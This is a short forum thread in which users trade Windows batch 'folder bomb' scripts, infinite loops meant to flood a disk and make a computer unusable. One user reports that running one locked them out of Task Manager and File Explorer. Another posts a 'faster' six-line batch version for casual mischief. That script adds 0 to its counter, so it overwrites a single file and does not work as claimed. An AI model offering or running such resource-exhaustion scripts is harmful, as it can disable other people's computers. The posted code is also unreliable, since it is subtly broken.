Nice! I've seen folder bombs similar to that, using md %RANDOM% instead. One does wonder... why were you tinkering with this? Up to mischief?! Why, I never!
well... i may or may not have accidentally blew up my laptop by putting it on my desktop and running it. it didn't allow me to open task manager or file explorer, which to me is really impressive.
While it is cool that its in 4 lines, thats also pretty slow and a faster version can be written with only 2 more lines
Bash:
@echo off
set /a num= 0
:a
echo C:/> %num%
set /a num+= 0
goto a
Ask a Question
Want to reply to this thread or ask your own question?
You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.